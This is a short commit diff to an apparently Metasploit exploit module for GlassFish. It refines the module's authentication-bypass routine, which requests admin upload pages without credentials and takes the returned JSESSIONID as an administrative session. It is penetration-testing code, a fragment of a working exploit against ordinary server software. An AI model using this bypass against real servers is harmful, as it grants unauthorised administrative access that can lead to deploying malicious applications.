Fix auth bypass

wchen-r7 · wchen-r7 · commit c826785ebb57 · 2015-06-24T19:49:04.000-05:00
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -631,20 +631,22 @@ def init_loginscanner
   end
 
   def try_glassfish_auth_bypass(version)
-    sid = false
+    sid = nil
 
     if version == '2.x' || version == '9.x'
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/applications/upload.jsf', 'get')
-      p = /<title>Deploy Enterprise Applications\/Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Enterprise Applications/Modules</title>'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     else
       # 3.0
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
-      p = /<title>Deploy Applications or Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Applications or Modules'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     end
 
